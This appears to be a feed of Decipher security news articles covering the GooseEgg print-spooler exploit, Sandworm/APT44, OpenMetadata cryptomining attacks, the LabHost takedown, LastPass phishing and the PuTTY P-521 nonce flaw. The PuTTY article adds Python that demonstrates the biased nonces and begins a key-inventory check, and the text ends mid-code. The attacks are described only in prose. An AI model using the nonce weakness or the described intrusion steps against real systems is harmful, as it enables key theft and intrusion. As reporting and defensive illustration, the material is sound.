“The GooseEgg binary—which has included but is not limited to the file names justice.exe and DefragmentSrv.exe—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity.”

The first command doesn’t do much, but the second and third commands launch the actual exploit for the CVE-2022-38028 vulnerability, and the fourth one checks to make sure the exploit worked. Microsoft researchers said GooseEgg can create a new directory and when the Print Spooler service tries to load a specific driver, it is redirected to the attacker-created directory, where there is a function that has been modified by the attacker.

“This results in the auxiliary DLL wayzgoose.dll launching in the context of the PrintSpooler service with SYSTEM permissions. wayzgoose.dll is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code,” the Microsoft analysis says.

]]>
<![CDATA[Decipher Podcast: Source Code 4/19]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/decipher-podcast-source-code-4-19 https://duo.com/decipher/decipher-podcast-source-code-4-19

]]>
<![CDATA[A Decade of Sandworm: Digging into APT44’s Past and Future]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/a-decade-of-sandworm-digging-into-apt44-s-past-and-future https://duo.com/decipher/a-decade-of-sandworm-digging-into-apt44-s-past-and-future

After Mandiant recently “graduated” the notorious Sandworm group into APT44, Decipher’s Lindsey O’Donnell-Welch and Mandiant analysts Dan Black and Gabby Roncone reflect on the most pivotal moments from Sandworm over the last decade, from NotPetya to the Ukraine electric power grid attacks. Below is a lightly edited transcript from the video interview conversation.

Lindsey O’Donnell-Welch: This is Lindsey O'Donnell Welch with Decipher and I'm joined today by two analysts with Mandiant, and we're going to talk about some new research that Mandiant released this week on the Sandworm group, now known as APT44. So here with me today is Dan Black, Mandiant principal analyst with Google Cloud, and Gabby Roncone, Mandiant senior analyst for the advanced practices team with Google Cloud. Dan and Gabby, Sandworm has been around for more than a decade, it's been affiliated with the Russian GRU, but Mandiant this week graduated Sandworm into an official APT group. Can you tell me a little bit about the decision process behind that? The group's been around for fifteen or so years - why now, and what went into that?

Gabby Roncone: Mandiant’s graduation process is this very unique, analytically rigorous process that we do and we've done since APT1, to essentially look back at all of our threat groups that are related to a certain threat actor, and do a rigorous deep dive on each one of those threat groups - try to understand the historical activity that we've seen and the current activity that we're seeing, and tie them together in order to graduate them into an APT.

This is something that gets kicked off when we believe that a threat group is especially deserving of the higher threat assessment kind of associated with the title. So for us, Sandworm was this group that obviously has been incredibly active over the last ten years, since we've been tracking them, but has been sort of the primary cyber sabotage unit for the Russian military intelligence since the war in Ukraine started. And when we saw sort of the prominent role that Sandworm was taking in Ukraine, and we were also undergoing so much of our own research in Ukraine with incident response engagements and such, we believed that we needed to undergo the graduation process as well, to make sure that our understanding of that group was really as in-depth as it could be. So, we spent over a year going through every single cluster of activity we thought might be related to Sandworm in the past and the present, and we were luckily able to tie those major historical incidents to the group that we are now seeing in Ukraine.

Lindsey O’Donnell-Welch: Can you talk a little bit about the advantages of having an APT designation like this and how it fits into giving threat intelligence that's associated with this group's activities more context in the future?

“The most obvious sort of pivotal moment to me is their movement into wartime operations, but I think that, even though our classification of the Russia war in Ukraine started on February 24, 2022, the really disruptive attacks in Ukraine start after the invasion in 2014.”

Dan Black: Yeah, so I think to reflect a little bit on what Gabby said as well, the process of graduating something from a UNC to maybe a temporary name that we give something - so Sandworm was very much a temporary name that we had designated - you can think of the step to take it to an APT as us reflecting a very deep level of understanding and confidence in what we are talking about, and so this is kind of like the latest stage of a process for us to say “hey this is a very high severity threat, this is something that we have a very refined understanding of and we want to make sure that our customers, the public are understanding that threat in the same way that we are.” So a lot of what we tried to do in this report is write something that will hold the test of time to really contextualize what we've seen from a group over the past decade - its proclivities, its tendencies, what it likes to do, the wide scope of activity that it partakes in - in hopes that that'll help people understand for their own threat models for the next decade in terms of what to expect, when they should think that they might be in the targeting scope of this group and what they should think about seeing in their networks if that's the case.

Lindsey O’Donnell-Welch: When I'm writing about these threat actors I always like to go down history lane and Sandworm has an absolutely extensive history in part because they've been behind super high-profile attacks. But then also, in the 2010s, it was really crazy to see these types of attacks where the group was using such destructive types of malware. So from your vantage point looking at anything from the Industroyer Ukraine electric power grid attacks to the NotPetya attacks, what have been some of the more pivotal moments over the years of tracking Sandworm from a threat Intel perspective?

Gabby Roncone: I feel like we can both take this one because I feel that we'll maybe have the same answer or maybe we'll have different answers. I feel like with this group everyone sort of picks their own thing that they really enjoy tracking. The most obvious sort of pivotal moment to me is their movement into wartime operations, but I think that, even though our classification of the Russia war in Ukraine started on February 24, 2022, the really disruptive attacks in Ukraine start after the invasion in 2014. A year after the invasion, you have the first blackout with BlackEnergy 2 in the Ukrainian power grid, and then almost exactly a year later you have the next one with Industroyer. It seems like this group has been able to propel itself forward by actioning these really specific high-level mandates that align really strongly with the Russian government interests at the time. And you see them just be active in every single geopolitical event that Russia seems to be having high stakes in. But kind of going off of that, you don't necessarily see the wartime pace of activity and just the rapid adaptation, prior to 2022, that you then do in wartime. So it's been really interesting to see how this group that's sort of been at the forefront of a lot of these novel operations that seem to almost push the line in the sand a little bit for what we see as norms in cyberspace over and over, for the last ten years, and then just suddenly ramping up their efforts very significantly during wartime.

“When you have a group that's moving first, that often means that there's lessons to be learned to identify from what they've done.”

Dan Black: Yeah. If I could reflect on something Gabby kept saying there - “novel,” “first,” “innovative” - all these concepts and the fact that they've often been the first mover in the threat landscape for some of the most brazen and reckless things we've seen. The first group to try to disrupt an energy grid with manual interaction and with custom malware to do that. The first to do this brazen case of digital election interference in 2016 with the U.S. elections, then trying to double down with that in 2017 in the French elections. The petty disruption of the Olympic Games in 2018 because they weren't allowed to participate under their national flag. It's a series of firsts in this space, and the thing that really drove us to want to report on this in-depth is the proliferation risk we see from some of that. When you have a group that's moving first, that often means that there's lessons to be learned to identify from what they've done, and the challenge that we see is when they do those kind of things is that either countries that are developing cyber attack programs, non-state actors who want to cause a little bit of chaos, they have this body of evidence to learn from because they're so forward-leaning in terms of the risk appetite. Their willingness to act is unparalleled. I think when you see other countries talked about in terms of developing cyber attack programs, they tend to do this in a test range or a test environment, something where they can collect the evidence they need but not expose it to the world. It almost seems like you know over the course of ten years, Sandworm/APT44 has participated in what's equivalent to live fire exercises. They've just done it in the real world with no concern for the downstream risks, the second order consequences, of what they're doing. 
The proliferation risk from this stuff, whether you think about back to 2015 when they first used Industroyer, to some of the stuff that we reported on just last year, about what they used in October 2022, the MicroSCADA, the living off the land attacks against OT technologies, they're the first ones to take these steps and other folks are going to absorb some of those lessons, iterate, adapt from what they've done, and they just make the threat landscape a little bit more dangerous every time they do that.

Gabby Roncone: I think also, one of the things kind of building on Dan's point here, that we found really interesting looking at Sandworm’s wiper operations even from the beginning of the war, is that they went from using these wipers that we call multifaceted - so they have different components to them, they can do multiple things outside of wiping - to these pure wipers. And the pure wipers I guess are just wipers that wipe. They aren’t setting persistence, they have no network communications, they're not really doing anything other than to just be a lightweight tool to cause some disruption. But they are also moving into using sort of fake ransomware and you kind of see echoes of ransomware tactics in some of Sandworm's operations too, which I think goes along with the brazenness of the actor, but also that bit of proliferation risk that Dan's talking about. Not only is Sandworm learning from ransomware actors that are causing real-time disruption in hospitals, in very high-risk environments, but they're also teaching the APT threat environment how to do that as well. So it's a very interesting situation.

Lindsey O’Donnell-Welch: That is an interesting dynamic. Now in more recent years I know that you guys have done a lot of research into what some of the activities of the group have been especially as it relates to both the war with Ukraine, but then also kind of some of the espionage activities that they've launched even outside of that situation. That was also highlighted in your research this week. One thing that stuck out to me has been this shift a little more towards espionage efforts that was outlined in the research. Can you talk a little bit more about what you're seeing there with the group, because, like you said, there's a lot there in terms of both using destructive malware but then also having these other elements to its attacks and I think espionage is one very interesting area that this group has carved out.

“So it's not necessarily about the enterprise networks that we saw them targeting in the beginning, but really more towards the high value targets of the front lines, ways that they can influence the outcomes of the conflict.”

Dan Black: Yeah I can take a first stab at least so I think one of the interesting things in thinking about Sandworm’s operations or APT44’s operations from the beginning of the war until today, is that Russia's war aims - what they've tried to achieve during the war - have evolved over that time. I think we all understand from reading all the different things that were out there that Russia thought it was going to win a very quick war at the beginning right? They thought that this thing was going to be over in a couple of weeks and so they kind of threw everything against the wall. We saw this mass wave of disruptions, all kinds of different wiper malware being used and a really really high intensity campaign of operations in those opening months of the war. After the first few months, it started to become very apparent that this wasn't going to be a war that was going to end overnight, that it is going to be a longer war, that they were going to have to settle in for the long term. And so in that adjustment, in terms of Putin, Russia, the understanding though that the war aims had fundamentally changed and what they could achieve had changed, we started to see a shift in the types of operations we saw from Sandworm. It's been very instructive to see that as they settled into thinking this is a long war that this wasn't going to be a war that moved rapidly from one front to another, but that the front was going to move inch by inch, that they really settled into thinking about targeting mobile devices, about the platforms, the networks that are being used on the frontline. So it's not necessarily about the enterprise networks that we saw them targeting in the beginning, but really more towards the high value targets of the front lines, ways that they can influence the outcomes of the conflict.
And I think they learned very fast that being able to collect that intelligence in different forms from the front lines, that tactical type of intelligence, has a real benefit to the conventional forces. So Russia has this thing they call reconnaissance strike complex, it’s about how you pull data in to be able to support targeting all the different kind of outcomes on the front ends of the battlefield. They've really shifted towards that outcome at this point in time. So I think you know understanding what we're seeing here is really about understanding the different contours of the conflict and how they’ve learned to adapt to innovate, to absorb lessons of how to best support a long war, as their wider war aims changed.

Lindsey O’Donnell-Welch: Yeah, definitely. It’s interesting you mention the context there too because I do feel like there is so much geopolitical history that goes into not just the more recent years but just Sandworm and its activities over the past decade or 15 years. So I'd imagine having a deep knowledge as researchers and analysts of these different pieces of context and understanding the motives behind what Russia is doing or like why it might be doing one thing or the other also plays into a lot of how you view these different activity clusters.

Dan Black: Yeah, you know one other point I would make is that before 2022 we had never seen a high intensity armed conflict like this, with cyber operations supporting it at the scale, the intensity that we've seen, right? And so the change that we've seen from 2022 to 2024 is in part Sandworm learning how to best do that. If there's one thing that's true about this group, it’s that they tend to have more operational experience than anyone because they've been so forward leaning over the years, but the strategic context of an armed conflict is so different than the things that we've seen the day-to-day, and they really had to change the way they needed to operate to be able to support that environment when they're no longer in a kind of standalone role doing things like NotPetya but trying to support the movements of conventional forces on the ground - very, very different outcomes and no amount of theory is going to make you ready for what's going to happen in practice right? There's a steady evolution, adaptation, that learning process that's going on throughout the course of the war, they're doing that and it's our belief that in 2024 they're going to look very different than they did in 2023 as well. That learning process is still ongoing. They were on the defensive in 2023, and Russia's going back on the offensive so that may change the scope and the type of operations that we may see in the future as well.

“There's a steady evolution, adaptation, that learning process that's going on throughout the course of the war, they're doing that and it's our belief that in 2024 they're going to look very different than they did in 2023 as well.”

Lindsey O’Donnell-Welch: In the research you talked a little bit about the adoption of personas - these identities that essentially are the group creating these identities on Telegram channels or other areas to claim either responsibility for various disruptive wartime operations or to kind of add that extra psychological like emphasis to amplify its attacks and one persona that was mentioned was the CyberArmyofRussia_Reborn. Can you talk a little bit about what you're seeing with these personas and how they've been adopted by Sandworm/APT44 throughout the research that you've done on them?

Gabby Roncone: So Sandworm/APT44 has been using personas for a very long time. They have always had a really interesting blend of different types of operations that they conduct. So we consider Sandworm/APT44 to be a full spectrum threat actor and what this means is that they conduct disruptive operations, espionage operations, but also these influence operations. And these types of operations often are used to support each other for that psychological effect. With APT44 you might hear the name Guccifer 2.0 and have nightmares about 2016. Using these personas in cyber enabled influence operations allows them to take their operation to a different audience, create additional impacts and really show off their own successes or perceived successes. Those goals, those aims are basically what's happening here but in a different context.

We have seen three primary hacktivist personas since the war began in February 2022, but CyberArmyofRussia_Reborn is a particularly notable one because of how closely we've linked this group with actual APT44 disruptive operations. In one case, we saw a mismatch essentially between a hacktivist persona posting a claim for a wiper operation before the wiper operation actually successfully was deployed. So there's clearly a very close coordination between APT44 and CyberArmyofRussia_Reborn. There are several different reasons why CyberArmyofRussia_Reborn may be utilized in this way. They could be used in some cases to sort of take the effects of the war off of the front and make them amplified into civil society - especially since a lot of these wiper attacks aren't actually hitting military targets, they're hitting government and civil society organizations for the most part. So CyberArmyofRussia_Reborn also has elements to it that, even though they're coordinating with APT44, they are definitely doing some weird like DDoS stuff that - who knows if that's necessarily tied to - APT44 or not so we have to be a bit careful with our assessment there.

Lindsey O’Donnell-Welch: Thank you both so much for coming on, especially as we continue to look at where Sandworm and APT44 is going in the future - should be really interesting to see how this group continues to evolve.

]]>
<![CDATA[OpenMetadata Bugs Enable Kubernetes Cryptomining Attacks]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/openmetadata-bugs-enable-kubernetes-cryptomining-attacks https://duo.com/decipher/openmetadata-bugs-enable-kubernetes-cryptomining-attacks

Threat actors have been exploiting known vulnerabilities in open-source platform OpenMetadata in order to access Kubernetes workloads and use them for cryptomining.

The flaws being targeted (CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848 and CVE-2024-28254) affect OpenMetadata versions prior to 1.3.1 and were previously disclosed and patched on March 15. OpenMetadata serves as a central repository to help users manage metadata across different data sources.

Researchers with Microsoft’s threat intelligence team in a Wednesday analysis said that they have observed attackers exploiting the vulnerabilities since the start of April, in order to bypass authentication and achieve remote code execution. Kubernetes has previously been at the center of attacks leveraging cryptocurrency miners, including a large campaign in 2020 launched against Kubernetes clusters that abused exposed Kubernetes dashboards.

“For initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet,” according to researchers. “Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.”

After exploiting these flaws, attackers perform a number of reconnaissance measures on the system, including reading the environment variables of the workloads - which might contain credentials for services enabling lateral movement - and running a series of commands to gather information about the victim’s environment like the network and hardware information, OS version and active users. The attackers also send ping requests to a publicly available service, in this case OAST domains that are associated with an open-source tool called Interactsh, which helps to detect out-of-band interactions.

“OAST domains are publicly resolvable yet unique, allowing attackers to determine network connectivity from the compromised system to attacker infrastructure without generating suspicious outbound traffic that might trigger security alerts,” said researchers. “This technique is particularly useful for attackers to confirm successful exploitation and validate their connectivity with the victim, before establishing a command-and-control (C2) channel and deploying malicious payloads.”

After this initial reconnaissance phase, attackers then download cryptomining malware from a remote server located in China, before executing the malware. The attackers also added a personal note to victims, saying their actions are harmless and that they need the money, and asking for donations in Monero.

“Lastly, for hands-on-keyboard activity, the attackers initiate a reverse shell connection to their remote server using Netcat tool, allowing them to remotely access the container and gain better control over the system,” said researchers. “Additionally, for persistence, the attackers use cronjobs for task scheduling, enabling the execution of the malicious code at predetermined intervals.”

Researchers recommend that users of OpenMetadata check the clusters that run their OpenMetadata workload and ensure that the image is updated to version 1.3.1 or later. If OpenMetadata is exposed to the internet, researchers urged users to use strong authentication.

]]>
<![CDATA[UK Police Take Down LabHost Phishing Service]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/uk-police-take-down-labhost-phishing-service https://duo.com/decipher/uk-police-take-down-labhost-phishing-service

Law enforcement agencies in the United Kingdom have disrupted a large-scale cybercrime group that ran a phishing-as-a-service operation known as LabHost, arresting nearly 40 people and taking down the LabHost infrastructure.

LabHost began operations in 2021 and authorities say that the group’s customers hit nearly 70,000 victims in the U.K. alone, and many more globally. As part of the disruption carried out this week, authorities sent messages to 800 LabHost users telling them that they are part of the investigation.

“We’ve shown them we know how much they’ve paid to LabHost, how many different sites they’ve accessed and how many lines of data they’ve received. Many of these individuals will remain the focus of investigation over the coming weeks and months,” the Metropolitan Police said in a release.

The LabHost platform was one of many such operations that offered users a number of services, including the ability to replicate the login pages for popular brands, allowing them to capture credentials from victims. Users could choose from a selection of pre-made templates or request customized ones. LabHost also offered users the ability to employ its custom LabRat malware tool, which can proxy connections between the victim and the targeted phished organization, allowing users to steal victims’ 2FA codes. At the time of this week’s disruption, law enforcement officials estimated that LabHost had about 2,000 active users.

The takedown operation was a joint effort between the Metropolitan Police, Europol, the National Crime Agency, and the City of London Police, along with other agencies. A number of technology companies also worked on the operation, including Microsoft, Trend Micro, Intel 471, Chainalysis, and the Shadowserver Foundation.

“This operation again demonstrates that UK law enforcement has the capability and intent to identify, disrupt and completely compromise criminal services that are targeting the UK on an industrial scale,” said Adrian Searle, Director of the National Economic Crime Center in the National Crime Agency.

Authorities said they arrested 37 people in this week’s operation, and are continuing to investigate other suspects. The LabHost takedown is the latest in a series of such operations by European law enforcement authorities targeting fraud, phishing, and ransomware groups in recent months. The largest of those operations was the takedown of the LockBit ransomware group and its infrastructure in February. That operation targeted LockBit’s operators as well as its infrastructure and also seized about 200 cryptocurrency accounts associated with its operators. Two suspected LockBit operators were arrested at the time, as well.

The LockBit and LabHost takedowns are prime examples of the cooperative efforts between law enforcement and security companies that are required to disrupt modern cybercrime operations. Many of these groups are transnational and they target victims around the world, requiring cooperation among agencies in many different countries, as well as work by threat intelligence and research teams at tech companies behind the scenes.

“Fraud is an international crime demanding a global approach. This operation is a fantastic demonstration of law enforcement agencies around the world coming together to crack down on criminals trying to take advantage of people in the UK,” said Security Minister Tom Tugendhat.

]]>
<![CDATA[Phishing Attack Targets LastPass Users’ Master Passwords]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/phishing-attack-targets-lastpass-users-master-passwords https://duo.com/decipher/phishing-attack-targets-lastpass-users-master-passwords

LastPass is warning of a phishing campaign designed to steal users’ master passwords and give attackers access to their password manager accounts.

In order to convince LastPass users to hand over their passwords, attackers used a mix of phone calls, phishing emails and a phishing page under the domain “help-lastpass[.]com,” which has since been taken down. If they were able to successfully obtain the users’ master passwords, attackers would log into the victims’ accounts and lock them out by changing their primary phone numbers, email addresses and the master password itself.

“Initially, we learned of a new parked domain (help-lastpass[.]com) and immediately marked the website for monitoring should it go live and start serving a phishing site intended to imitate our login page or something similar,” according to Mike Kosak, senior principal intelligence analyst with LastPass, in a Wednesday statement. “Once we identified that this site went active and was being used in a phishing campaign against our customers, we worked with our vendor to take down the site.”

Password managers like LastPass are top targets for attackers exactly because of their functionality as a centralized location for valuable credentials. In 2022, attackers were able to steal some LastPass customer data and gain access to the LastPass cloud storage service. Last week, the company said that a LastPass employee was unsuccessfully targeted by a deepfake audio call that impersonated the company CEO Karim Toubba.

LastPass also warned of another wide-scale phishing attack targeting its users last year, which included a link to a phishing page hosted on subdomains of “customer-lastpass[.]su.” That campaign had a global reach and targeted a variety of sectors, including 87 of the company's own employees.

While LastPass didn’t specify how many customers were targeted in its latest phishing campaign disclosed this week, and how many of the incidents were successful, the company said customers were receiving calls from 888 numbers claiming their accounts had been accessed from a new device, and instructing them to press “1” to enable access and “2” to block it. When customers pressed “2,” they were told they would receive a call shortly to “close the ticket.” They would then receive a call from someone with an American accent impersonating a LastPass employee. The caller could then send the victims an email, purporting to help them reset access to their account, which would actually take them to the phishing page in an attempt to steal their credentials.

The campaign, first unearthed by Lookout, appears to be linked to the CryptoChameleon phishing kit, which is a phishing-as-a-service offering for cybercriminals allowing them to create fake SSO sites using fraudulent branding in order to persuade victims to type in their credentials. CryptoChameleon, first discovered in February, has previously been used to target cryptocurrency platforms like Binance and Coinbase, as well as the Federal Communications Commission (FCC).

LastPass warned users not to respond to suspicious calls, texts and emails from people claiming to be from LastPass, and to alert them if these messages are received. The company said that no one at LastPass would ever ask customers for their master passwords.

“We have worked hard to disrupt this phishing campaign and have had the initial phishing site taken down,” said Kosak. “However, as the initial phishing kit itself continues to offer LastPass branding, we are sharing this information so that our customers can be aware of these tactics and take the appropriate response should they receive a suspicious call, text, or email.”

]]>
<![CDATA[Decipher Podcast: Cody Stokes]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-cody-stokes https://duo.com/decipher/decipher-podcast-cody-stokes

]]>
<![CDATA[Sandworm Group Shifts to Espionage Attacks, Hacktivist Personas]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/sandworm-group-shifts-to-espionage-attacks-hacktivist-personas https://duo.com/decipher/sandworm-group-shifts-to-espionage-attacks-hacktivist-personas

Recent activity by the well-known Sandworm group - which researchers with Mandiant have started calling APT44 - relies on a mix of espionage efforts and hacktivist personas, and shows how the group continues to pose a “persistent, high severity threat” to governments and critical infrastructure entities globally.

The threat group, which has been active for at least 15 years and is known to be affiliated with the Russian GRU, has played key roles in cyber operations supporting Russia’s military campaign as it enters its third year of war in Ukraine. Though the group is known for destructive malware attacks, Mandiant researchers said in a Wednesday analysis that APT44 has recently and increasingly conducted espionage-related attacks that likely support Russian military operations, such as intercepting communications via mobile networks or devices to gain a tactical military advantage. For instance, in August 2023 multiple governments warned of APT44’s Infamous Chisel malware, used to collect information about Android devices and applications specific to the Ukrainian military. Even with the ongoing war, researchers have seen the group launching espionage operations across North America, Europe, the Middle East, Central Asia and Latin America.

“APT44 is the most brazen threat actor there is, in the midst of one of the most intense campaigns of cyber activity we've ever seen, in full-blown support of Russia’s war of territorial aggression,” said Dan Black, principal analyst on the cyber espionage team with Google's Mandiant. “There is no other threat actor today that is more worthy of our collective attention, and the threat APT44 poses is evolving rapidly. Over the course of the war, we have seen APT44’s posture shift away from disruption as its primary focus toward espionage to provide battlefield advantage to Russia’s conventional forces.”

One emerging feature of APT44’s campaigns has been its emphasis on psychological operations that amplify the impact of its intrusions. The group has, for instance, created hacktivist identities on Telegram channels to claim responsibility for its various disruptive wartime operations. Based on clues including infrastructure similarities, Google’s Threat Analysis Group assesses that APT44 created and controls a persona called “CyberArmyofRussia_Reborn.” In January, that persona’s Telegram channel posted videos taking credit for the manipulation of human-machine interfaces used in water utilities in the U.S. and Poland. Mandiant researchers said they could not independently verify these claims of intrusion or their links to APT44, but noted that officials at the affected U.S. utilities have publicly acknowledged incidents at the same entities the CyberArmyofRussia_Reborn videos advertised as victims.

“The attacks on the water sector and other critical infrastructure in the US and Europe by Cyber Army of Russia Reborn (CARR) are very serious, though it’s not clear if this was actually the GRU,” said John Hultquist, Mandiant’s chief intel analyst. “APT44 has leveraged the hacktivist group as a front for its operations before, but it is possible others have become associated with CARR and are operating outside of the GRU’s control or direction. Nonetheless, the GRU’s proximity to this activity is worrying.”

The Russian threat group, which has been attributed by the U.S. Department of Justice and by the UK National Cyber Security Centre to the Russian GRU Unit 74455, has been behind several high-profile attacks, particularly leveraging malware with destructive functionalities in the 2010s. In 2015 and 2016, the group was behind malware attacks against Ukraine’s electric power grids using malware known as BlackEnergy, Industroyer and KillDisk. The group also launched the NotPetya malware attacks in 2017 against companies worldwide and the Olympic Destroyer malware campaigns against the 2018 PyeongChang Winter Olympic Games.

Part of what sets the group apart, researchers said, is its ability to specialize in various missions, such as collecting intelligence or conducting information operations, and integrate them into a unified playbook over time. APT44 has also used a diverse range of tactics, living-off-the-land techniques and initial access methods, from phishing and exploitation of known vulnerabilities to targeted supply-chain compromises.

Mandiant on Wednesday announced it has “graduated” Sandworm into APT44. Mandiant frequently “graduates” threat clusters to named APTs as it collects more information over time and its knowledge of a group’s activities increases. APT44 has been extensively tracked by Mandiant for more than a decade, but researchers said the near-term threat the group poses to elections in 2024 - a year in which at least 64 countries worldwide will hold elections - was one factor in the decision.

“Mandiant continues to see operations from the group that are global in scope in key political, military, and economic hotspots for Russia,” said Mandiant researchers in their analysis on Wednesday. “Given the active and persistent threat to governments and critical infrastructure operators globally, Mandiant has decided to graduate the group into APT44.”

]]>
<![CDATA[Critical Crypto Bug Fixed in PuTTY]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/critical-crypto-bug-fixed-in-putty https://duo.com/decipher/critical-crypto-bug-fixed-in-putty

Many versions of the PuTTY client have a subtle vulnerability that can allow an attacker to compromise some private keys and then forge signatures and log into any remote servers on which those keys are used.

The bug affects versions 0.68-0.80 of PuTTY, a popular client used for SSH, Telnet, and other remote communication protocols, and derives from the fact that when using a specific NIST elliptic curve, the client produces biased ECDSA nonces. The weakness only applies to 521-bit ECDSA keys generated when using the NIST P521 curve. In order to exploit this vulnerability, an attacker would need to see a few dozen signatures from the private key, but that is a plausible scenario. Researchers at Ruhr University in Germany discovered the flaw and published details of it on Monday. The bug has been fixed in PuTTY 0.81.

“The PuTTY client and all related components generate heavily biased ECDSA nonces in the case of NIST P-521. To be more precise, the first 9 bits of each ECDSA nonce are zero. This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques. These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents,” the advisory from the Ruhr University researchers says.
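The nonce bias the advisory describes comes down to arithmetic on bit lengths: a 512-bit hash output reduced modulo a 521-bit group order is left unchanged, so 9 of the 521 nonce bits are always zero. The Python below is an added illustration of that mechanism, not code from PuTTY or from the Ruhr University researchers. The P-521 group order is the real value from FIPS 186-4; the private scalar and message are constructed placeholders; and `full_width_nonce` is a simplified RFC 6979-style derivation written for contrast, not a description of how PuTTY 0.81 actually fixed the bug.

```python
import hashlib
import hmac

# Order n of the NIST P-521 base point (FIPS 186-4), a 521-bit prime.
P521_ORDER = int(
    "01FF" + "FFFFFFFF" * 7
    + "FFFFFFFA51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409",
    16,
)
QLEN = P521_ORDER.bit_length()  # 521 bits

# Constructed stand-ins for a private scalar and a message (not real key material).
SAMPLE_PRIVATE_KEY = (
    int.from_bytes(hashlib.sha512(b"constructed demo key").digest(), "big") % P521_ORDER
)
SAMPLE_MESSAGE = b"constructed message to sign"


def biased_nonce(priv: int, msg: bytes) -> int:
    """Nonce derivation with the defect the advisory describes: one 512-bit hash
    output is reduced modulo the 521-bit group order.  Every 512-bit value is
    already below n, so the reduction changes nothing and the nonce is < 2**512,
    which means the top 9 of its 521 bits are always zero."""
    digest = hashlib.sha512(priv.to_bytes(66, "big") + msg).digest()
    return int.from_bytes(digest, "big") % P521_ORDER


def full_width_nonce(priv: int, msg: bytes) -> int:
    """Simplified RFC 6979-style derivation (an illustration only, not PuTTY's
    actual fix): produce 1024 bits with a keyed hash, keep the leftmost QLEN
    bits so the candidate spans the full 521-bit range, and retry on the rare
    candidate outside [1, n-1]."""
    key = priv.to_bytes(66, "big")
    for attempt in range(256):  # far more retries than will ever be needed
        ctr = attempt.to_bytes(4, "big")
        stream = b"".join(
            hmac.new(key, msg + ctr + bytes([block]), hashlib.sha512).digest()
            for block in range(2)
        )
        candidate = int.from_bytes(stream, "big") >> (len(stream) * 8 - QLEN)
        if 1 <= candidate < P521_ORDER:
            return candidate
    raise RuntimeError("nonce derivation failed")  # practically unreachable


def leading_zero_bits(nonce: int) -> int:
    """Zero bits at the top of the nonce when written as a QLEN-bit integer."""
    return QLEN - nonce.bit_length()


def min_leading_zero_bits(priv: int, derive, count: int = 200) -> int:
    """Smallest leading-zero count over `count` nonces for distinct messages.
    The biased scheme never goes below 9; the full-width scheme reaches 0."""
    return min(
        leading_zero_bits(derive(priv, SAMPLE_MESSAGE + i.to_bytes(4, "big")))
        for i in range(count)
    )


if __name__ == "__main__":
    print("biased  min leading zero bits:", min_leading_zero_bits(SAMPLE_PRIVATE_KEY, biased_nonce))
    print("full    min leading zero bits:", min_leading_zero_bits(SAMPLE_PRIVATE_KEY, full_width_nonce))
```

Each biased signature hands an observer 9 known nonce bits, which is what makes recovery from roughly 60 signatures feasible with the lattice techniques the advisory refers to. The defensive lesson is that a deterministic nonce derivation has to produce at least qlen bits and reject out-of-range candidates, rather than reducing a shorter value modulo the group order.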

“Luckily, client signatures are transmitted within the secure channel of SSH, requiring a malicious server to acquire such signatures. If the key has been used to sign arbitrary data (e.g., git commits by forwarding Pageant to a development host), the publicly available signatures (e.g., on GitHub) can be used as well.”

PuTTY has been around for more than 20 years and while it was developed for Windows originally, it’s open source and has been ported to some other operating systems. The client can be used for remote sessions on servers, file transfers, and other functions. The Ruhr University researchers said that users should discard any client keys generated by the NIST P521 curve on affected versions of PuTTY.

“All NIST P-521 client keys used with PuTTY must be considered compromised, given that the attack can be carried out even after the root cause has been fixed in the source code (assuming that ~60 pre-patch signatures are available to an adversary),” the advisory says.
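Because the advice is to discard and replace affected client keys, a server-side inventory of which authorized keys are 521-bit ECDSA keys is a practical first step. The Python below is an added example, not a tool from the PuTTY project or the researchers: it parses authorized_keys content, including entries with leading options, decodes each blob and reports any entry whose key type is ecdsa-sha2-nistp521 (the only type the advisory names). The sample file and the key blobs in it are constructed placeholders, not real public keys.

```python
import base64
import shlex
import struct

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")
AFFECTED_TYPE = "ecdsa-sha2-nistp521"  # the only key type the advisory names


def _ssh_string(data: bytes) -> bytes:
    """Length-prefixed string as used in the SSH public key wire format."""
    return struct.pack(">I", len(data)) + data


def make_blob(key_type: str, *fields: bytes) -> str:
    """Base64 public-key blob built from constructed fields; used only to build
    the sample file below (the points are placeholders, not real keys)."""
    raw = _ssh_string(key_type.encode()) + b"".join(_ssh_string(f) for f in fields)
    return base64.b64encode(raw).decode()


# Constructed sample authorized_keys content covering the cases that matter here.
_ED25519_POINT = b"\x01" * 32
_P256_POINT = b"\x04" + b"\x02" * 64
_P521_POINT = b"\x04" + b"\x03" * 132
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample; blobs are placeholders, not real public keys",
    "ssh-ed25519 " + make_blob("ssh-ed25519", _ED25519_POINT) + " alice@laptop",
    "ecdsa-sha2-nistp256 " + make_blob("ecdsa-sha2-nistp256", b"nistp256", _P256_POINT) + " bob@desktop",
    'from="10.0.0.0/8",command="/usr/bin/backup --run" ecdsa-sha2-nistp521 '
    + make_blob("ecdsa-sha2-nistp521", b"nistp521", _P521_POINT) + " backup-putty",
    "ecdsa-sha2-nistp521 " + make_blob("ecdsa-sha2-nistp521", b"nistp521", _P521_POINT) + " carol@win",
])


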